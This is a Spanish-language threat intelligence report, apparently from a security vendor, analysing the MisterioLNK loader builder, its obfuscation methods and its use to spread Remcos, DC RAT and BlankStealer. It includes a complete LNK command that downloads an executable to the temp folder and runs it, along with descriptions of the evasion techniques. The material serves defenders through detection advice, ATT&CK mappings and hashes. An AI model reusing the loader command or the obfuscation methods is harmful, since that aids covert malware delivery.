Cyble Research and Intelligence Labs (CRIL) ha descubierto un nuevo constructor de cargadores no detectado anteriormente conocido como «MisterioLNK». Este descubrimiento sigue a nuestro análisis anterior de Quantum Software, otro creador de archivos LNK que ha ido ganando terreno en el panorama cibernético. MisterioLNK, disponible en GitHub, presenta un desafío importante para las defensas de seguridad, ya que los archivos generados por esta herramienta actualmente exhiben tasas de detección mínimas o nulas por parte de los sistemas de seguridad convencionales. Como se describe en GitHub, MisterioLNK es un generador de cargadores de código abierto que aprovecha los motores de script de Windows para ejecutar cargas útiles maliciosas y al mismo tiempo emplea ofuscación. Está diseñado para funcionar discretamente, descargando archivos en directorios temporales antes de ejecutarlos, mejorando así sus capacidades evasivas y dificultando la detección mediante medidas de seguridad tradicionales. Las características clave de MisterioLNK incluyen soporte para cinco métodos de carga (HTA, BAT, CMD, VBS y LNK), así como tres métodos de ofuscación específicamente para VBS, CMD y BAT, con planes de agregar pronto soporte para la ofuscación de HTA. Además, la herramienta permite personalizar el icono de los archivos LNK. El proyecto se encuentra actualmente en su fase beta y el autor advirtió que pueden existir errores y problemas. Animan a los usuarios a informar cualquier problema a través de la página de problemas de GitHub. Además, el autor renuncia a cualquier responsabilidad por actividades ilegales realizadas con este software y enfatiza que los usuarios deben asegurarse de que sus acciones cumplan con las leyes y regulaciones pertinentes. La siguiente figura muestra la publicación de GitHub del desarrollador. Figura 1: Página de GitHub para MisterioLNK Los actores de amenazas (TA) han comenzado a utilizar el generador de cargadores MisterioLNK para generar archivos ofuscados para implementar malware, como Remcos RAT, DC RAT y BlankStealer. Es alarmante que estos cargadores estén evadiendo en gran medida la detección, y muchos de ellos pasan desapercibidos para la mayoría de los proveedores de seguridad. Figura 2: Detección de archivos maliciosos generados por MisterioLNK Builder (Fuente: Virus Total) Para nuestra investigación, generamos todas las combinaciones de los archivos del cargador para evaluar sus capacidades de detección. Las muestras creadas con el constructor MisterioLNK revelaron que de seis archivos, solo uno fue detectado con 16 detecciones, dos archivos tuvieron una detección cada uno y tres archivos mostraron cero detecciones. Si bien los proveedores de seguridad detectan con éxito los cargadores LNK y VBS ofuscados producidos por este constructor, las tasas de detección de archivos de cargador BAT, CMD, HTA y VBS siguen siendo bajas, como se muestra en la siguiente figura. Figura 3: Detección de muestra de POC Detalles técnicos Misterio.exe, una herramienta basada en .NET, consta de dos módulos principales: un generador de cargador y un ofuscador. El constructor acepta una URL que aloja una carga útil maliciosa de segunda etapa y genera archivos BAT, CMD, HTA, LNK o VBS según la selección del usuario. Los archivos generados están diseñados para conectarse a la URL, descargar la carga útil y ejecutarla. Además, el constructor puede ofuscar los archivos del cargador BAT, CMD y VBS y al mismo tiempo permitir que se agreguen íconos personalizados. La siguiente figura ilustra el Misterio Dropper. Figura 4 – Misterio – Dropper Builder Cargador y ofuscador BAT/CMD El cargador BAT/CMD generado por el constructor está diseñado para descargar archivos de URL específicas usando el comando `curl`, seguido de la ejecución de los archivos descargados. El script resultante se guarda con un icono de archivo personalizado para mejorar el engaño. Cuando se habilita la ofuscación, el script sufre una capa adicional de ocultación. El módulo de ofuscación utiliza una técnica que inserta cadenas aleatorias entre caracteres en el código por lotes. Procesa cada línea del script agregando cadenas aleatorias, encerradas entre signos de porcentaje (%), a caracteres que aún no están dentro de los signos de porcentaje. Este enfoque introduce datos aparentemente aleatorios en el código para confundir las herramientas de análisis estático y al mismo tiempo permite que el script se ejecute sin problemas. Además, se agrega una línea de comentario al inicio del guión, indicando que fue procesado por “MisterioLNK”. Figura 5 – Cargadores BAT/CMD Cargador HTA: El cargador HTA (aplicación HTML) generado por el constructor utiliza objetos JavaScript y ActiveX para ejecutar comandos para descargar y ejecutar archivos. Si bien la función de ofuscación para archivos HTA está actualmente inactiva, podría implementarse en el futuro. Este enfoque crea un archivo HTML con contenido de script integrado diseñado para ejecutarse sin problemas al iniciarse. Figura 6 – Cargador HTA Cargador VBS y Ofuscador: El Cargador VBS aprovecha un objeto de shell para ejecutar comandos para descargar y ejecutar el archivo de destino. Admite la ofuscación para mejorar sus capacidades de sigilo. El proceso de ofuscación convierte cada carácter de VBScript en su representación de código ASCII usando la función `Chr()`, lo que da como resultado una serie de llamadas `Chr()` concatenadas que reconstruyen los caracteres originales cuando se ejecutan. Luego, el script ofuscado se encapsula dentro de una función `Execute()`, que evalúa y ejecuta el código oculto. Este enfoque oscurece efectivamente la lógica del script, lo que dificulta la interpretación de las herramientas de análisis estático. Figura 7 – VBS Loader LNK Loader: la herramienta crea un archivo de acceso directo (.lnk) que, al ejecutarse, activa un comando para descargar y ejecutar el archivo de destino. También admite la configuración de un ícono personalizado para el archivo LNK para mejorar su disfraz. El comando de destino creado por el creador de enlaces es “C:\Windows\system32\cmd.exe /c mode 15,1 & curl hxxps://live.sysinternals.com/du.exe -o %temp%\ntvy4adp.exe & inicie /b %temp%\ntvy4adp.exe”. La siguiente figura muestra las propiedades del archivo LNK. Figura 8: Propiedades del archivo LNK creado por LNK Loader Builder Juntos, estos módulos forman un poderoso conjunto de herramientas para generar y ocultar scripts que pueden entregar y ejecutar cargas útiles con una detección mínima. Su diseño enfatiza la flexibilidad, la adaptabilidad y la evasión, lo que las convierte en herramientas potentes en el contexto del desarrollo de amenazas y, al mismo tiempo, resalta los riesgos potenciales si se usan incorrectamente. Conclusión MisterioLNK es un generador de cargadores versátil diseñado para crear y ocultar scripts que descargan y ejecutan cargas útiles utilizando varios motores de scripts de Windows. Con soporte para múltiples formatos de archivos (BAT, CMD, HTA, VBS y LNK) y técnicas avanzadas de ofuscación, MisterioLNK evade eficazmente la detección de las herramientas de seguridad tradicionales. Aunque actualmente se encuentra en versión beta, su adaptabilidad y su enfoque en la evasión lo convierten en una amenaza importante en el panorama de la ciberseguridad. La naturaleza de código abierto del proyecto y las exenciones de responsabilidad legal resaltan el potencial de uso indebido. Nuestras recomendaciones Implemente soluciones de seguridad que puedan reconocer y detectar los patrones de ofuscación específicos y los formatos de script generados por MisterioLNK Builder. Utilice políticas de restricción de software o listas blancas de aplicaciones para limitar la ejecución de scripts no autorizados y reducir la superficie de ataque para cargadores como MisterioLNK. Céntrese en estrategias de detección de comportamiento para identificar actividades sospechosas, como el uso de motores de secuencias de comandos para descargar y ejecutar archivos, independientemente de la ofuscación. Eduque a los usuarios sobre los riesgos asociados con la ejecución de archivos de fuentes desconocidas o no confiables, enfatizando los peligros de los archivos de acceso directo aparentemente benignos (.lnk). Técnicas MITRE ATT&CK® Técnica tácticaProcedimientoEjecución (TA0002)Ejecución de usuario: Archivo malicioso (T1204.002)MisterioLNK utiliza múltiples formatos de script (BAT, CMD, HTA, VBS, LNK) que dependen de la interacción del usuario para ejecutar la carga útil, generalmente engañando a los usuarios para que ejecutando el archivo del cargador.Ejecución (TA0002)Intérprete de comandos y secuencias de comandos (T1059)Utiliza lenguajes de secuencias de comandos como BAT, CMD y VBS para ejecutar comandos en el sistema de destino.Ejecución (TA0002)Intérprete de comandos y secuencias de comandos: Visual Basic (T1059.005) Implementa archivos VBScript ofuscados que ejecutan comandos para descargar y ejecutar cargas útiles adicionales. Ejecución (TA0002) Intérprete de comandos y secuencias de comandos: Visual Basic (T1059.003) Se basa en la línea de comandos de Windows (cmd.exe) para emitir comandos para la descarga y ejecución de archivos. Evasión de defensa (TA0005) Enmascaramiento: tipo de archivo enmascarado (T1036.008) Utiliza archivos LNK con íconos alterados para disfrazar el cargador como un archivo legítimo, lo que aumenta la probabilidad de interacción del usuario. Evasión de defensa (TA0005) Archivos o información ofuscados: Ofuscación de comandos ( T1027.010)MisterioLNK emplea técnicas de ofuscación para ocultar el contenido de sus scripts, lo que dificulta la detección mediante herramientas de seguridad.Defence Evasion (TA0011)Protocolo de capa de aplicación: protocolos web (T1071.001)Utiliza HTTP/S a través del comando curl para comunicarse con servidores remotos para descargar cargas útiles. Indicadores de compromiso Indicador Tipo de indicador Descripción3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17SHA256Remcosdba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1 a353f72dba9ffa2b850SHA256Remcos1be9fcca5fd587accd9dbfa1b6a67a2e6bb58465dd78f775c40f6eb6480bfb5fSHA256Remcos64fd11a9befea1310503336a6a8194fca7ab7af29 1562787c4985d1a1f06b4e1SHA256Remcos0d32a67ee4193520116d2435d1d579811c5ab71c7550d433948eb82e027cc601SHA256DC RAT7f8737e14ca51c1724c0f65a 568cefa4d9e1536416ddf89569eab2cce8ae2e01SHA256BlankStealer Relacionado